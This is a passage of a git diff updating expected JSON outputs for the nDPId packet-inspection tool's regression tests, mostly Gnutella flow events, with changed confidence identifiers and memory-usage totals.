+00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72852,"flow_last_seen":491978,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.250.99.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72852,"flow_last_seen":491978,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.250.99.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4196,11 +4196,11 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490846,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":28681,"dst_port":8890,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":88704,"flow_last_seen":593713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":19428,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"finished","flow_packets_processed":1251,"flow_first_seen":114930,"flow_last_seen":537520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1051202,"flow_avg_l4_payload_len":840,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":88704,"flow_last_seen":593713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":19428,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"finished","flow_packets_processed":1251,"flow_first_seen":114930,"flow_last_seen":537520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1051202,"flow_avg_l4_payload_len":840,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially 
Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":493283,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":493283,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":373494,"flow_last_seen":551890,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.68.255","src_port":28681,"dst_port":12838,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4215,7 +4215,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490658,"flow_last_seen":490658,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433135,"flow_last_seen":433135,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.170.209.214","src_port":28681,"dst_port":46210,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433135,"flow_last_seen":433135,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.170.209.214","src_port":28681,"dst_port":46210,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"finished","flow_packets_processed":295,"flow_first_seen":90745,"flow_last_seen":593624,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":9996,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"finished","flow_packets_processed":295,"flow_first_seen":90745,"flow_last_seen":593624,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":9996,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4252,8 +4252,8 @@ 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":71205,"flow_last_seen":593376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":5915,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":71205,"flow_last_seen":593376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":5915,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"167.114.170.156","src_port":28681,"dst_port":23844,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"167.114.170.156","src_port":28681,"dst_port":23844,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","packets-captured":7491,"packets-processed":7468,"total-skipped-flows":0,"total-l4-payload-len":3617715,"total-not-detected-flows":629,"total-guessed-flows":2,"total-detected-flows":170,"total-detection-updates":3,"total-updates":298,"current-active-flows":0,"total-active-flows":801,"total-idle-flows":801,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":4259,"global_ts_msec":600247} 
@@ -4265,9 +4265,9 @@ ~~ total active/idle flows...: 801/801 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7049358 bytes -~~ total memory freed........: 7049358 bytes -~~ total allocations/frees...: 129026/129026 +~~ total memory allocated....: 7182992 bytes +~~ total memory freed........: 7182992 bytes +~~ total allocations/frees...: 131788/131788 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 179 chars ~~ json string max len.......: 1916 chars diff --git a/test/results/google_ssl.pcap.out b/test/results/google_ssl.pcap.out index a5b8f8f48..4d04c4fbf 100644 --- a/test/results/google_ssl.pcap.out +++ b/test/results/google_ssl.pcap.out @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872303 bytes -~~ total memory freed........: 5872303 bytes -~~ total allocations/frees...: 118143/118143 +~~ total memory allocated....: 6005937 bytes +~~ total memory freed........: 6005937 bytes +~~ total allocations/frees...: 120905/120905 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 662 chars diff --git a/test/results/googledns_android10.pcap.out b/test/results/googledns_android10.pcap.out index 3f420b3c9..311dceb4c 100644 --- a/test/results/googledns_android10.pcap.out +++ b/test/results/googledns_android10.pcap.out 
@@ -11,23 +11,23 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"} 
-00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 